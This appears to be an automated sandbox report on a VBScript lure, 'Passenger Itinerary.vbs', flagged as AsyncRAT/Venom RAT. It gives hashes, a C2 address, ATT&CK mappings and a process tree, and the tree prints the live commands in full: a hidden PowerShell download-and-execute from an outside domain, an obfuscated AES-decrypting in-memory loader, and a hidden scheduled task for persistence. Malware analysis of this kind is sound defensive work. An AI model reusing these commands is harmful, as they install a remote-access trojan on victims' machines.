asyncrat | 6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-12-2024 14:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Passenger Itinerary.vbs
Size

78KB
MD5

f5bfac09b17af66506e500ce22c71f92
SHA1

bf949f2cb7457bcc173e0b98f656be133a088225
SHA256

6415105cf9e677626d5d9d25520b1dd1279bb8bc2ee820787d0fcc76ecd3e663
SHA512

5cab281eae07d317c02f031986b472967b4ffdca1dc3343d4e697f1ae1d8503ba237e5e1c7b60b55154f29421f7d3c79e1f125b56f96b98bcd58fa1677756d26
SSDEEP

1536:9dKIP+7Eys+3Xe05WVD8/PSfxDrtlsMKePYPm9nPJ6oMM:9dKIP8EyF3rqD8/2xvtBP0InR6NM

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

45.149.241.239:1978

Mutex

ewdlylafhlapsawrztd

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/3576-63-0x000001F366E50000-0x000001F366E68000-memory.dmp	family_asyncrat

Blocklisted process makes network request 5 IoCs

flow	pid	Process
33	3576	powershell.exe
37	3576	powershell.exe
43	3576	powershell.exe
44	3576	powershell.exe
46	3576	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1008	powershell.exe
1176	powershell.exe
1068	powershell.exe
3576	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
1008	powershell.exe
1008	powershell.exe
1176	powershell.exe
1176	powershell.exe
1068	powershell.exe
1068	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeIncreaseQuotaPrivilege	1068	powershell.exe
Token: SeSecurityPrivilege	1068	powershell.exe
Token: SeTakeOwnershipPrivilege	1068	powershell.exe
Token: SeLoadDriverPrivilege	1068	powershell.exe
Token: SeSystemProfilePrivilege	1068	powershell.exe
Token: SeSystemtimePrivilege	1068	powershell.exe
Token: SeProfSingleProcessPrivilege	1068	powershell.exe
Token: SeIncBasePriorityPrivilege	1068	powershell.exe
Token: SeCreatePagefilePrivilege	1068	powershell.exe
Token: SeBackupPrivilege	1068	powershell.exe
Token: SeRestorePrivilege	1068	powershell.exe
Token: SeShutdownPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeSystemEnvironmentPrivilege	1068	powershell.exe
Token: SeRemoteShutdownPrivilege	1068	powershell.exe
Token: SeUndockPrivilege	1068	powershell.exe
Token: SeManageVolumePrivilege	1068	powershell.exe
Token: 33	1068	powershell.exe
Token: 34	1068	powershell.exe
Token: 35	1068	powershell.exe
Token: 36	1068	powershell.exe
Token: SeIncreaseQuotaPrivilege	1068	powershell.exe
Token: SeSecurityPrivilege	1068	powershell.exe
Token: SeTakeOwnershipPrivilege	1068	powershell.exe
Token: SeLoadDriverPrivilege	1068	powershell.exe
Token: SeSystemProfilePrivilege	1068	powershell.exe
Token: SeSystemtimePrivilege	1068	powershell.exe
Token: SeProfSingleProcessPrivilege	1068	powershell.exe
Token: SeIncBasePriorityPrivilege	1068	powershell.exe
Token: SeCreatePagefilePrivilege	1068	powershell.exe
Token: SeBackupPrivilege	1068	powershell.exe
Token: SeRestorePrivilege	1068	powershell.exe
Token: SeShutdownPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeSystemEnvironmentPrivilege	1068	powershell.exe
Token: SeRemoteShutdownPrivilege	1068	powershell.exe
Token: SeUndockPrivilege	1068	powershell.exe
Token: SeManageVolumePrivilege	1068	powershell.exe
Token: 33	1068	powershell.exe
Token: 34	1068	powershell.exe
Token: 35	1068	powershell.exe
Token: 36	1068	powershell.exe
Token: SeIncreaseQuotaPrivilege	1068	powershell.exe
Token: SeSecurityPrivilege	1068	powershell.exe
Token: SeTakeOwnershipPrivilege	1068	powershell.exe
Token: SeLoadDriverPrivilege	1068	powershell.exe
Token: SeSystemProfilePrivilege	1068	powershell.exe
Token: SeSystemtimePrivilege	1068	powershell.exe
Token: SeProfSingleProcessPrivilege	1068	powershell.exe
Token: SeIncBasePriorityPrivilege	1068	powershell.exe
Token: SeCreatePagefilePrivilege	1068	powershell.exe
Token: SeBackupPrivilege	1068	powershell.exe
Token: SeRestorePrivilege	1068	powershell.exe
Token: SeShutdownPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeSystemEnvironmentPrivilege	1068	powershell.exe
Token: SeRemoteShutdownPrivilege	1068	powershell.exe
Token: SeUndockPrivilege	1068	powershell.exe
Token: SeManageVolumePrivilege	1068	powershell.exe
Token: 33	1068	powershell.exe
Token: 34	1068	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3576	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1520 wrote to memory of 1008	1520	WScript.exe	82
PID 1520 wrote to memory of 1008	1520	WScript.exe	82
PID 1520 wrote to memory of 3904	1520	WScript.exe	93
PID 1520 wrote to memory of 3904	1520	WScript.exe	93
PID 3904 wrote to memory of 5076	3904	cmd.exe	95
PID 3904 wrote to memory of 5076	3904	cmd.exe	95
PID 3904 wrote to memory of 1176	3904	cmd.exe	96
PID 3904 wrote to memory of 1176	3904	cmd.exe	96
PID 1176 wrote to memory of 1068	1176	powershell.exe	97
PID 1176 wrote to memory of 1068	1176	powershell.exe	97
PID 1176 wrote to memory of 8	1176	powershell.exe	99
PID 1176 wrote to memory of 8	1176	powershell.exe	99
PID 8 wrote to memory of 5088	8	WScript.exe	100
PID 8 wrote to memory of 5088	8	WScript.exe	100
PID 5088 wrote to memory of 3920	5088	cmd.exe	102
PID 5088 wrote to memory of 3920	5088	cmd.exe	102
PID 5088 wrote to memory of 3576	5088	cmd.exe	103
PID 5088 wrote to memory of 3576	5088	cmd.exe	103

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Passenger Itinerary.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mvtIQEpeE2igYXIdDEEHrUp8bEsGaEVGh0sp8SAhblA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vT8eb5DW9nWYQVd4hxOXDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GQouJ=New-Object System.IO.MemoryStream(,$param_var); $OJwfz=New-Object System.IO.MemoryStream; $jgIod=New-Object System.IO.Compression.GZipStream($GQouJ, [IO.Compression.CompressionMode]::Decompress); $jgIod.CopyTo($OJwfz); $jgIod.Dispose(); $GQouJ.Dispose(); $OJwfz.Dispose(); $OJwfz.ToArray();}function execute_function($param_var,$param2_var){ $zmCZQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $brFtT=$zmCZQ.EntryPoint; $brFtT.Invoke($null, $param2_var);}$tofzw = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $tofzw;$UpwQA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tofzw).Split([Environment]::NewLine);foreach ($ZFAFd in $UpwQA) { if ($ZFAFd.StartsWith('hSymiLYPJtzQULYISQvX')) { $aTuto=$ZFAFd.Substring(20); break; }}$payloads_var=[string[]]$aTuto.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:5076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_647_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_647.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1068
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_647.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:8
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_647.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5088
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mvtIQEpeE2igYXIdDEEHrUp8bEsGaEVGh0sp8SAhblA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vT8eb5DW9nWYQVd4hxOXDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GQouJ=New-Object System.IO.MemoryStream(,$param_var); $OJwfz=New-Object System.IO.MemoryStream; $jgIod=New-Object System.IO.Compression.GZipStream($GQouJ, [IO.Compression.CompressionMode]::Decompress); $jgIod.CopyTo($OJwfz); $jgIod.Dispose(); $GQouJ.Dispose(); $OJwfz.Dispose(); $OJwfz.ToArray();}function execute_function($param_var,$param2_var){ $zmCZQ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $brFtT=$zmCZQ.EntryPoint; $brFtT.Invoke($null, $param2_var);}$tofzw = 'C:\Users\Admin\AppData\Roaming\Windows_Log_647.bat';$host.UI.RawUI.WindowTitle = $tofzw;$UpwQA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tofzw).Split([Environment]::NewLine);foreach ($ZFAFd in $UpwQA) { if ($ZFAFd.StartsWith('hSymiLYPJtzQULYISQvX')) { $aTuto=$ZFAFd.Substring(20); break; }}$payloads_var=[string[]]$aTuto.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:3920
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aa8efa56e1e40374bbd21e0e469dceb7

SHA1
33a592799d4898c6efdd29e132f2f76ec51dbc08

SHA256
25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

SHA512
ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w03ny4lz.oda.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
cc49ce3b6a2c61afa08d46410a78514a

SHA1
2a0f7a3890ee4844194715d83aa6bf771250e9d6

SHA256
26f4a4fe560cd59fdcaf064f059865da9b9723b7f8c8480e3e6bd8ccd6b3faf7

SHA512
f785cb451bb0ecfd554e65152652222860803e560ebe06a526c7f17b3bdeda9033a29a0250f97450b37bdf9d34599ccb9e5cb57fd97e46b83140076557b19d0b

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_647.vbs

Filesize
115B

MD5
6717d01a4213e31da42c2a0313d1da0b

SHA1
2784b1b8bad498855d9f8a3a2876929da3dc27c3

SHA256
e16278384d3c4c065c0f6a1a4e74f2144eac6e068b00c6c819390ce9200fe38f

SHA512
6e9a799e91677eb1789541cf74b6bd7c8563de5dcdbd972e65cbac7e39968d842bd345787634ee80ecd098f6c032f136544be68c24d1db8e3b903fab09b7ebec

Download Submit
memory/1008-12-0x00007FFCED2A0000-0x00007FFCEDD61000-memory.dmp

Filesize
10.8MB

Download
memory/1008-15-0x00007FFCED2A0000-0x00007FFCEDD61000-memory.dmp

Filesize
10.8MB

Download
memory/1008-16-0x00007FFCED2A0000-0x00007FFCEDD61000-memory.dmp

Filesize
10.8MB

Download
memory/1008-0-0x00007FFCED2A3000-0x00007FFCED2A5000-memory.dmp

Filesize
8KB

Download
memory/1008-11-0x00007FFCED2A0000-0x00007FFCEDD61000-memory.dmp

Filesize
10.8MB

Download
memory/1008-6-0x00000221FAC30000-0x00000221FAC52000-memory.dmp

Filesize
136KB

Download
memory/1176-31-0x0000017F25A90000-0x0000017F25AD4000-memory.dmp

Filesize
272KB

Download
memory/1176-32-0x0000017F25B60000-0x0000017F25BD6000-memory.dmp

Filesize
472KB

Download
memory/1176-33-0x0000017F23590000-0x0000017F23598000-memory.dmp

Filesize
32KB

Download
memory/1176-34-0x0000017F235A0000-0x0000017F235B2000-memory.dmp

Filesize
72KB

Download
memory/3576-63-0x000001F366E50000-0x000001F366E68000-memory.dmp

Filesize
96KB

Download